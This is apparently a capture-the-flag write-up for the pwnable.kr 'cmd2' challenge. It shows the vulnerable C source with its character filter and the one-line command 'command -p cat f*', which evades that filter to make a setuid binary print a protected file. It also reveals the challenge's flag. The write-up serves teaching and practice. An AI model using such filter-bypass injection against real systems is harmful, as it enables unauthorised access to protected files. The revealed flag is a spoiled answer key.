Start by connecting to the server, with the password from the previous challenge.

[[email protected] ~]$ ssh [email protected] -p2222
[email protected] password:
 ____  __    __  ____    ____  ____   _        ___      __  _  ____  
|    \|  |__|  ||    \  /    ||    \ | |      /  _]    |  |/ ]|    \
|  o  )  |  |  ||  _  ||  o  ||  o  )| |     /  [_     |  ' / |  D  )
|   _/|  |  |  ||  |  ||     ||     || |___ |    _]    |    \ |    /
|  |  |  `  '  ||  |  ||  _  ||  O  ||     ||   [_  __ |     \|    \
|  |   \      / |  |  ||  |  ||     ||     ||     ||  ||  .  ||  .  \
|__|    \_/\_/  |__|__||__|__||_____||_____||_____||__||__|\_||__|\_|

- Site admin : [email protected]
- IRC : irc.netgarage.org:6667 / #pwnable.kr
- Simply type "irssi" command to join IRC now
- files under /tmp can be erased anytime. make your directory under /tmp
- to use peda, issue `source /usr/share/peda/peda.py` in gdb terminal
Last login: Mon May 28 01:22:41 2018 from 203.229.187.102
[email protected]:~$ ls -la
total 40
drwxr-x---  5 root cmd2     4096 Oct 23  2016 .
drwxr-xr-x 87 root root     4096 Dec 27 23:17 ..
d---------  2 root root     4096 Jul 14  2015 .bash_history
-r-xr-sr-x  1 root cmd2_pwn 8794 Dec 21  2015 cmd2
-rw-r--r--  1 root root      586 Dec 21  2015 cmd2.c
-r--r-----  1 root cmd2_pwn   30 Jul 14  2015 flag
dr-xr-xr-x  2 root root     4096 Jul 21  2015 .irssi
drwxr-xr-x  2 root root     4096 Oct 23  2016 .pwntools-cache

Now we can view the source code of the challenge.

#include <stdio.h>
#include <string.h>

int filter(char* cmd){
	int r=0;
	r += strstr(cmd, "=")!=0;
	r += strstr(cmd, "PATH")!=0;
	r += strstr(cmd, "export")!=0;
	r += strstr(cmd, "/")!=0;
	r += strstr(cmd, "`")!=0;
	r += strstr(cmd, "flag")!=0;
	return r;
}

extern char** environ;
void delete_env(){
	char** p;
	for(p=environ; *p; p++)	memset(*p, 0, strlen(*p));
}

int main(int argc, char* argv[], char** envp){
	delete_env();
	putenv("PATH=/no_command_execution_until_you_become_a_hacker");
	if(filter(argv[1])) return 0;
	printf("%s\n", argv[1]);
	system( argv[1] );
	return 0;
}

As we can see, logic of the challenge is mostly the same as in the previous one. But in addition, we have more filters to bypass - especially \ character which was used in our previous exploit.

Firstly, I’ve noticed that quite easy way to get to the flag is to use an wildcard. Something like cat fla* will allow us to view the flag, as it’s the only file with such a name. But how to bypass the slash?

After that let’s search how exactly commands are executed with system() command. From man pages, we can see that this command uses sh to execute a command in this particular way execl("/bin/sh", "sh", "-c", command, (char *) 0);

Now we can resaerch information about sh in order to find some help. Another man page gives us something interesting. Command command [-p] [utility [argument ...]] with -p option allows us to search using a default value of PATH. It is guaranteed to find all of the standard utilities.

[email protected]:~$ ./cmd2 "command -p cat f*"
command -p cat f*
FuN_w1th_5h3ll_v4riabl3s_haha